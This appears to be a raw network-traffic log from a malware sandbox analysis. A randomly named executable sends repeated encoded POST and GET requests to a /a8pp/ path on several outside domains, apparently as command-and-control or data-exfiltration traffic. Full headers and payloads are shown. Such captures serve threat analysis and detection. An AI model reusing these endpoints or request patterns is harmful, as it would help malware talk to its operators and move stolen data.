                                        set-cookie: sid=28ef2a05-226f-11ef-bb48-bc9b676f98d5; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:16 GMT; max-age=2147483647; HttpOnly
                                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                        Data Ascii: Redirecting


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        38192.168.11.304983223.82.12.29807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:12.106271982 CEST786OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Origin: http://www.seductionsessions.co.uk
                                        Referer: http://www.seductionsessions.co.uk/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6a 30 47 42 42 72 7a 75 49 35 63 67 35 38 30 2b 4b 71 55 55 71 48 73 4a 35 72 68 67 4c 69 67 2f 4e 71 51 4a 49 46 71 44 37 4b 51 47 30 4c 45 42 45 69 55 58 6a 62 59 6c 54 42 4f 73 4b 45 71 6a 7a 53 77 61 6b 56 46 5a 45 6f 45 55 50 30 39 6b 61 76 5a 4a 4f 75 35 41 70 45 34 62 58 32 72 72 45 55 6d 50 70 33 7a 65 69 6a 53 58 33 61 30 4a 31 66 63 71 6a 6c 39 63 70 47 55 6e 76 6b 51 68 70 39 34 75 39 52 32 55 33 61 68 30 44 72 36 63 61 31 4e 6e 6c 74 6b 65 2b 69 4f 6e 31 59 4c 36 37 54 46 2f 55 38 52 50 43 41 75 2f 66 76 4e 43 38 6c 32 4a 77 66 2b 30 73 74 6a 62 59 30 32 43 35 6d 45 6d 74 6a 66 45 71 5a 6b 4a 53 4b 64 67 45 79 6a 77 6f 44 38 3d
                                        Data Ascii: 2NlhHLS8=j0GBBrzuI5cg580+KqUUqHsJ5rhgLig/NqQJIFqD7KQG0LEBEiUXjbYlTBOsKEqjzSwakVFZEoEUP09kavZJOu5ApE4bX2rrEUmPp3zeijSX3a0J1fcqjl9cpGUnvkQhp94u9R2U3ah0Dr6ca1Nnltke+iOn1YL67TF/U8RPCAu/fvNC8l2Jwf+0stjbY02C5mEmtjfEqZkJSKdgEyjwoD8=
                                        Jun 4, 2024 14:37:12.239658117 CEST376INHTTP/1.1 302 Found
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 11
                                        date: Tue, 04 Jun 2024 12:37:11 GMT
                                        location: http://survey-smiles.com
                                        server: nginx
                                        set-cookie: sid=2a83f4f0-226f-11ef-81e6-bc9b01a9cbc5; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:19 GMT; max-age=2147483647; HttpOnly
                                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                        Data Ascii: Redirecting


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        39192.168.11.304983323.82.12.29807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:14.764712095 CEST1703OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Origin: http://www.seductionsessions.co.uk
                                        Referer: http://www.seductionsessions.co.uk/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6a 30 47 42 42 72 7a 75 49 35 63 67 35 38 30 2b 4b 71 55 55 71 48 73 4a 35 72 68 67 4c 69 67 2f 4e 71 51 4a 49 46 71 44 37 4b 59 47 30 34 4d 42 46 44 55 58 67 62 59 6c 51 42 50 72 4b 45 72 68 7a 53 35 54 6b 56 49 75 45 74 41 55 41 78 70 6b 63 65 5a 4a 56 65 35 41 67 6b 34 59 4b 47 72 2b 45 55 32 4c 70 33 6a 65 69 6a 53 58 33 59 63 4a 79 4e 6b 71 34 6c 38 75 39 57 55 37 72 6b 51 46 70 39 68 54 39 52 79 75 30 75 64 30 44 4c 4b 63 63 48 56 6e 74 74 6b 6d 75 79 50 34 31 59 58 6c 37 54 4a 46 55 35 74 6c 43 42 61 2f 66 75 73 55 37 55 71 32 69 4d 4f 5a 33 2f 66 67 55 79 76 63 2b 42 31 45 73 53 6e 30 73 59 46 6b 56 61 64 54 51 58 6a 52 2b 6e 59 74 69 54 47 73 43 63 42 66 47 79 30 48 56 4a 47 35 43 4c 65 51 68 53 57 72 49 55 61 47 63 37 4a 4a 73 74 2b 4f 55 35 4d 4c 2f 68 76 6a 37 67 38 68 66 4c 2b 72 70 48 35 4e 78 67 6d 57 52 48 77 49 52 65 5a 73 30 56 66 37 72 6a 46 73 42 35 79 30 61 49 2b 6e 30 47 4f 78 56 31 77 54 6a 71 48 65 6d 4e 43 71 33 37 42 63 50 4a 46 44 6c 49 64 76 78 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=j0GBBrzuI5cg580+KqUUqHsJ5rhgLig/NqQJIFqD7KYG04MBFDUXgbYlQBPrKErhzS5TkVIuEtAUAxpkceZJVe5Agk4YKGr+EU2Lp3jeijSX3YcJyNkq4l8u9WU7rkQFp9hT9Ryu0ud0DLKccHVnttkmuyP41YXl7TJFU5tlCBa/fusU7Uq2iMOZ3/fgUyvc+B1EsSn0sYFkVadTQXjR+nYtiTGsCcBfGy0HVJG5CLeQhSWrIUaGc7JJst+OU5ML/hvj7g8hfL+rpH5NxgmWRHwIReZs0Vf7rjFsB5y0aI+n0GOxV1wTjqHemNCq37BcPJFDlIdvxM/jFZFY+t4vgrYQXo19RVnnsJjlK9X7dy6Px8r5bkzfs7eqby01SWz/VMroMbsaN0HJ7wv+I2fb3+pat/fcvUIG8voDvEA48StNx3dBDTM3cutY7F8nWMkq5YYvBGCCRp1NPzVmMsiY6U3yRL/aI60/7VZzWb9CdlHmCHt8m5TVgGS2kX4Pb0ZwwIvUrZTVcjW8MXVHFoACVKPH7RwTiwdQG5fu33n6Ec41KQBhPVrrz+4bNl6pbY5ruxQ+B0QglzKYLalpDiEC6cIoCgR5AON22ikkf8u7roQSS1n9vj87oEO9LkqpH1h2ORbRZMrNG3EMCsCby3rTbVrJCqa5l9gWPsTTaogzoG9G21EWvk66WVtjSJq8q+/Ya8ULo+NX5+BL9zHVdrCe274l+Q1N3BruTjlN1p/4+Gfdgofyt3k72U+MpOuepKVqe212BuuzFwL1qOBP2LQvBohFCydZMisbtO6ZOTjqlVY3SzwjLe2EXPOiOZcAj7Dqcblum4fBYtNryRz1OLTJN6m0d9g6huhGckXhDr0LbrPc1zNCXFmwvWiR8fmAFxv+IgXb8Yc3t5rvAATCZq377N0uuaMCGW7e1zW6qMng3mW+ovGTmTwQW8+kvewi6Q/a32zPazGeXdgjJu0PsEP0QX1V5lHsowd/XzqQiCLPgOY [TRUNCATED]
                                        Jun 4, 2024 14:37:15.074223042 CEST376INHTTP/1.1 302 Found
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 11
                                        date: Tue, 04 Jun 2024 12:37:14 GMT
                                        location: http://survey-smiles.com
                                        server: nginx
                                        set-cookie: sid=2c1a1ca2-226f-11ef-86a8-bc9bf24bb264; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:22 GMT; max-age=2147483647; HttpOnly
                                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                        Data Ascii: Redirecting


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        40192.168.11.304983423.82.12.29807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:17.421441078 CEST477OUTGET /a8pp/?2NlhHLS8=u2uhCbPEKv8ZkpElCasipCYoh7hjVHsJeshUYXe+26UO54wjNRlGrJIqe2/bB2Gg6hxh2QUpPcZvKht3Zd5FEOczln0DFiPIHlW4j3CMtDHw4ZJy68kQvjE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:17.705903053 CEST1096INHTTP/1.1 200 OK
                                        accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                        cache-control: max-age=0, private, must-revalidate
                                        connection: close
                                        content-length: 641
                                        content-type: text/html; charset=utf-8
                                        date: Tue, 04 Jun 2024 12:37:16 GMT
                                        server: nginx
                                        set-cookie: sid=2daf6efa-226f-11ef-b4a2-bc9b1f251352; path=/; domain=.seductionsessions.co.uk; expires=Sun, 22 Jun 2092 15:51:24 GMT; max-age=2147483647; HttpOnly
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 64 75 63 74 69 6f 6e 73 65 73 73 69 6f 6e 73 2e 63 6f 2e 75 6b 2f 61 38 70 70 2f 3f 30 7a 3d 6a 58 5a 68 64 64 73 70 70 4c 26 32 4e 6c 68 48 4c 53 38 3d 75 32 75 68 43 62 50 45 4b 76 38 5a 6b 70 45 6c 43 61 73 69 70 43 59 6f 68 37 68 6a 56 48 73 4a 65 73 68 55 59 58 65 2b 32 36 55 4f 35 34 77 6a 4e 52 6c 47 72 4a 49 71 65 32 25 32 46 62 42 32 47 67 36 68 78 68 32 51 55 70 50 63 5a 76 4b 68 74 33 5a 64 35 46 45 4f 63 7a 6c 6e 30 44 46 69 50 49 48 6c 57 34 6a 33 43 4d 74 44 48 77 34 5a 4a 79 36 38 6b 51 76 6a 45 25 33 44 26 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a [TRUNCATED]
                                        Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.seductionsessions.co.uk/a8pp/?0z=jXZhddsppL&2NlhHLS8=u2uhCbPEKv8ZkpElCasipCYoh7hjVHsJeshUYXe+26UO54wjNRlGrJIqe2%2FbB2Gg6hxh2QUpPcZvKht3Zd5FEOczln0DFiPIHlW4j3CMtDHw4ZJy68kQvjE%3D&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcxNzUxMTgzNywiaWF0IjoxNzE3NTA0NjM3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydmFzcW5ocTM3YTlkNDFmZmsxOTlnaWUiLCJuYmYiOjE3MTc1MDQ2MzcsInRzIjoxNzE3NTA0NjM3NDk3MDI3fQ.DtA4imPzyuPANtGNRQR6fhM5o9jS7Oq2fvL2B7QWD-k&sid=2daf6efa-226f-11ef-b4a2-bc9b1f251352');</script></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        41192.168.11.304983591.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:23.129023075 CEST739OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Origin: http://www.calmparents.us
                                        Referer: http://www.calmparents.us/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 41 69 34 4a 4b 6f 6d 32 41 48 77 34 48 71 6c 78 35 38 58 63 35 70 73 48 7a 5a 6b 37 52 37 7a 4f 4f 49 4c 33 44 4c 51 71 56 63 43 47 44 6d 5a 67 36 61 74 45 53 36 30 33 52 46 6b 5a 51 64 59 78 6c 73 32 69 37 39 71 6c 4d 30 72 65 37 34 30 43 75 4d 71 73 6b 39 6f 57 78 68 79 75 38 6e 4c 64 50 59 6d 42 71 70 45 4c 42 71 56 45 38 78 5a 78 78 71 36 42 4f 38 2b 42 72 69 39 42 78 58 38 65 32 68 30 61 6d 41 42 31 79 4d 48 4d 49 71 35 4b 77 78 58 6e 4c 44 46 70 52 2f 55 2b 72 5a 64 51 2f 56 37 52 58 58 53 4c 70 67 4a 4a 65 38 42 31 36 73 77 43 6e 51 59 6f 4a 56 70 49 6d 74 36 51 66 77 3d 3d
                                        Data Ascii: 2NlhHLS8=Ai4JKom2AHw4Hqlx58Xc5psHzZk7R7zOOIL3DLQqVcCGDmZg6atES603RFkZQdYxls2i79qlM0re740CuMqsk9oWxhyu8nLdPYmBqpELBqVE8xZxxq6BO8+Bri9BxX8e2h0amAB1yMHMIq5KwxXnLDFpR/U+rZdQ/V7RXXSLpgJJe8B16swCnQYoJVpImt6Qfw==
                                        Jun 4, 2024 14:37:23.353728056 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        42192.168.11.304983691.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:25.886507988 CEST759OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Origin: http://www.calmparents.us
                                        Referer: http://www.calmparents.us/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 41 69 34 4a 4b 6f 6d 32 41 48 77 34 45 4c 56 78 31 2f 76 63 2f 4a 73 41 74 4a 6b 37 4b 4c 7a 4b 4f 49 50 33 44 4f 77 41 55 75 57 47 45 43 56 67 39 59 56 45 52 36 30 33 61 6c 6b 59 50 4e 59 36 6c 73 36 63 37 35 69 6c 4d 30 2f 65 37 35 45 43 75 2f 43 76 6c 74 6f 51 39 42 79 6f 69 58 4c 64 50 59 6d 42 71 6f 67 68 42 75 78 45 38 68 70 78 7a 4c 36 43 4e 38 2b 43 6f 69 39 42 6d 6e 38 53 32 68 31 2f 6d 43 30 67 79 4f 2f 4d 49 72 4a 4b 77 67 58 6b 46 7a 46 72 66 66 56 76 72 61 6f 6c 2f 46 54 59 5a 77 76 52 6f 6c 49 39 53 4c 77 76 6e 76 45 41 30 77 6b 46 56 55 45 67 6b 76 37 4c 43 2b 50 5a 6d 4b 4c 58 74 4f 37 47 35 62 72 31 43 67 4f 78 2f 4c 55 3d
                                        Data Ascii: 2NlhHLS8=Ai4JKom2AHw4ELVx1/vc/JsAtJk7KLzKOIP3DOwAUuWGECVg9YVER603alkYPNY6ls6c75ilM0/e75ECu/CvltoQ9ByoiXLdPYmBqoghBuxE8hpxzL6CN8+Coi9Bmn8S2h1/mC0gyO/MIrJKwgXkFzFrffVvraol/FTYZwvRolI9SLwvnvEA0wkFVUEgkv7LC+PZmKLXtO7G5br1CgOx/LU=
                                        Jun 4, 2024 14:37:26.112297058 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        43192.168.11.304983791.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:28.636523962 CEST1676OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Origin: http://www.calmparents.us
                                        Referer: http://www.calmparents.us/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 41 69 34 4a 4b 6f 6d 32 41 48 77 34 45 4c 56 78 31 2f 76 63 2f 4a 73 41 74 4a 6b 37 4b 4c 7a 4b 4f 49 50 33 44 4f 77 41 55 75 4f 47 44 78 64 67 37 35 56 45 51 36 30 33 54 46 6b 64 50 4e 59 6e 6c 6f 57 51 37 35 76 48 4d 77 50 65 39 61 4d 43 6f 4f 43 76 76 74 6f 51 69 78 79 74 38 6e 4c 79 50 59 57 46 71 6f 77 68 42 75 78 45 38 6a 42 78 67 36 36 43 4c 38 2b 42 72 69 39 46 78 58 38 2b 32 68 39 46 6d 43 77 77 79 66 66 4d 49 4c 5a 4b 79 57 72 6b 48 54 46 74 59 66 56 33 72 61 30 4d 2f 46 65 6e 5a 77 79 30 6f 69 45 39 52 65 45 30 31 73 77 33 74 43 67 33 65 48 55 58 6f 63 37 39 41 4d 50 64 75 49 44 7a 70 74 58 38 67 65 44 47 5a 69 32 47 73 62 34 52 66 2f 6e 4b 50 6d 31 64 76 66 66 45 66 76 69 36 46 70 47 36 48 33 78 38 76 6f 51 6f 59 52 58 72 55 32 4d 56 4b 44 6d 58 62 34 54 4f 54 49 58 36 42 42 58 47 4a 43 7a 47 31 56 68 66 37 6d 55 6d 66 67 54 52 71 68 4c 4c 75 4d 32 47 78 48 62 53 45 59 4a 2b 48 38 66 6e 4e 47 32 2f 52 44 4d 33 72 6c 46 5a 36 65 4d 42 59 46 56 44 4b 66 59 56 75 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=Ai4JKom2AHw4ELVx1/vc/JsAtJk7KLzKOIP3DOwAUuOGDxdg75VEQ603TFkdPNYnloWQ75vHMwPe9aMCoOCvvtoQixyt8nLyPYWFqowhBuxE8jBxg66CL8+Bri9FxX8+2h9FmCwwyffMILZKyWrkHTFtYfV3ra0M/FenZwy0oiE9ReE01sw3tCg3eHUXoc79AMPduIDzptX8geDGZi2Gsb4Rf/nKPm1dvffEfvi6FpG6H3x8voQoYRXrU2MVKDmXb4TOTIX6BBXGJCzG1Vhf7mUmfgTRqhLLuM2GxHbSEYJ+H8fnNG2/RDM3rlFZ6eMBYFVDKfYVugeN3KvYBBTjeNSRS6+QemTqITvcZ7wAx4I7BVg295jj21NFhtXGUu9XCcVxiX7oRwUWNhTnNdT4tGwcXXMyd51pmk/TCCX5M7oaQylM8ojXgIu+iKU10hrOK3Hv1e1p672RlB7UfRXQHti1/r33HSnRetR4ZkYlomJZpP9YpXh4nrajsme61owd1xWMY9vmVS3SSQJ9pd8DBBSOBTrApuuvw5dQmdryqPMtcO7AJ2mouv3OmhTjTcs80gK7m1x7qeD/44wjxBuJPjotpWOdX3KZaDcWf8S07g8NjvUrpJ88Op8U7lzdqScfQ8Hizrs+Jw0VV/CkKUCvhjtTpMYOxbIFyoZh8TrRbWG5Oxznrvzoneqsk08+zJ9KkocNtPmPhoVnc9hjRga7KvvRwMWkxYaaidQCdRDrmrU00gps5pmVyYrmwzpyHsoH4tiHs7eXhfm55obbrjfczP9ZQh0gXrZaQ9r8rMMRYsv42QO1HybS688eaB9LXBVIv4llgSJsjRG0J9hq/UKuQdBwqORmuZt7Km14MShWyfT7HB3sst42tTxpIZIIDxi/34Lmwshmzq7gg07f68barAx33Um27kAIfP12TAD7U32P4bqncw0hlrrl8wBrxU84cAl5Ly0a0cG/RTahLzlJmj3HkYYCiIkaTROWlvbYhTK [TRUNCATED]
                                        Jun 4, 2024 14:37:28.863012075 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        44192.168.11.304983891.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:31.388113022 CEST468OUTGET /a8pp/?2NlhHLS8=NgQpJdLFdHgIa+1l29O1770Oq5lPJcvTMZvJdcQ/YcKsMhli5q4lfY4xaSICRuQBpvWxqNirPVzUz7JPsPacp8Mg1AroxlnuY82gnIQ9XdoCkQd3w5aTNck=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.calmparents.us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:31.617096901 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        45192.168.11.3049839162.240.81.18807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:37.118160009 CEST748OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.tintasmaiscor.com
                                        Origin: http://www.tintasmaiscor.com
                                        Referer: http://www.tintasmaiscor.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 31 4a 7a 57 64 62 61 2b 31 6a 47 61 63 32 41 6d 43 68 4d 38 55 39 58 58 38 77 36 47 62 37 50 70 79 56 42 53 66 39 32 4f 67 30 68 50 52 6c 72 65 79 70 7a 4b 43 4a 53 68 41 31 4c 71 79 4d 57 4e 33 70 5a 43 52 50 44 37 6d 43 41 32 33 77 49 70 51 79 67 68 6f 6b 48 59 58 4c 6c 2f 32 4b 6c 73 55 37 58 30 6d 46 50 45 52 32 78 63 46 54 78 61 4c 70 6a 67 50 64 4e 63 59 38 35 59 6a 79 48 57 31 38 2f 4d 45 35 4b 43 59 30 72 53 6a 50 6a 2b 73 77 51 69 51 54 55 4a 65 43 53 59 46 67 6d 51 79 57 56 4c 72 6b 4e 57 67 69 48 75 71 7a 56 76 56 39 51 42 38 30 62 6e 57 35 72 41 32 66 64 6f 68 77 3d 3d
                                        Data Ascii: 2NlhHLS8=1JzWdba+1jGac2AmChM8U9XX8w6Gb7PpyVBSf92Og0hPRlreypzKCJShA1LqyMWN3pZCRPD7mCA23wIpQyghokHYXLl/2KlsU7X0mFPER2xcFTxaLpjgPdNcY85YjyHW18/ME5KCY0rSjPj+swQiQTUJeCSYFgmQyWVLrkNWgiHuqzVvV9QB80bnW5rA2fdohw==
                                        Jun 4, 2024 14:37:37.291728020 CEST1289INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 04 Jun 2024 12:37:37 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "636d2d22-e42"
